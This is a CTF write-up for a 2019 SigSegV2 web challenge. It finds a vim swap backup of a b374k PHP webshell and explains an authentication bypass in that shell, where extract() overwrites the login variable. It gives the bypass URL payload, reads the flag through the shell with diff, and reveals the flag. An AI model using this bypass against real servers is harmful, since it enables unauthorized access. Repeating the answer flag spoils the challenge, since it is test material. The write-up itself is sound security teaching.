Information displayed for CTF players:

• Name of the challenge / Nom du challenge: Une porte peut en cacher une autre
• Category / Catégorie: Web
• Internet: not needed
• Difficulty / Difficulté: Medium / Moyen

A very famous backdoor was placed on the website, but hopefully it is password protected.

Flag format: sigsegv{flag}

author: [noraj](https://pwn.by/noraj/)

• Hint1: b374k.php
• Hint2: vim

This challenge require a Docker Engine and Docker Compose.

Builds, (re)creates, starts, and attaches to containers for a service:

$ docker-compose up --build

Add -d if you want to detach the container.

The webshell is b374k.php. The comment on the home page says the hacker used vim. Let's look for a .swp vim backup file: b374k.php.swp.

Let's look at the code:

$GLOBALS['pass'] = "09c7018841af655c9b025c0a3e5b167d05f42cd1"; // sha1(md5(pass))
...
$GLOBALS['login'] = 1;

@extract($_REQUEST["noraj"], EXTR_OVERWRITE);
...
if(!function_exists('auth')){
	function auth(){
		if(isset($GLOBALS['pass']) && (trim($GLOBALS['pass'])!='')){
			$c = $_COOKIE;
			$p = $_POST;
			if($GLOBALS['login'] == 0 || isset($p['pass'])){
				$your_pass = sha1(md5($p['pass']));
				if($GLOBALS['login'] == 0 || $your_pass==$GLOBALS['pass']){
					setcookie("pass", $GLOBALS['pass'], time()+36000, "/");
					header("Location: b374k.php");
				}
			}

It's no use to try to guess the password, it is sha1(md5(pass)) of a strong one.

But we can see there is $GLOBALS['login'] = 1;, like login enabled and then there are $GLOBALS['login'] == 0 || isset($p['pass']) and $GLOBALS['login'] == 0 || $your_pass==$GLOBALS['pass']. So if $GLOBALS['login'] == 0 the login feature will be disable and we will gain access to the shell without using a password.

extract allows to Import variables into the current symbol table from and to overwrite it. So let's use it to overwrite $GLOBALS['login'] and bypass the authentication.

The payload is http://x.x.x.x/b374k.php?noraj[login]=0 or just http://x.x.x.x/b374k.php?noraj[login].

So we have a webshell but most of useful binaries for listing directories or reading a file were removed.

We have two options, do it in pure PHP or find a non-removed binary.

For example reading the flag with diff:

/usr/src/app/>diff /home/noraj/flag.txt /etc/hostname
--- /home/noraj/flag.txt
+++ /etc/hostname
@@ -1 +1 @@
-sigsegv{∙∙∙∙∙·▫▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒnorajᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫▫·∙∙∙∙∙}
\ No newline at end of file
+da3acf79d34a

More about backdored backdoors: https://rawsec.ml/en/c99-php-backdoor-backdoored/

sigsegv{∙∙∙∙∙·▫▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒnorajᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫ₒₒ▫ᵒᴼᵒ▫▫·∙∙∙∙∙}

A web challenge that was available during SigSegV2 CTF (2019).

10 teams on 36 flaged this challenge.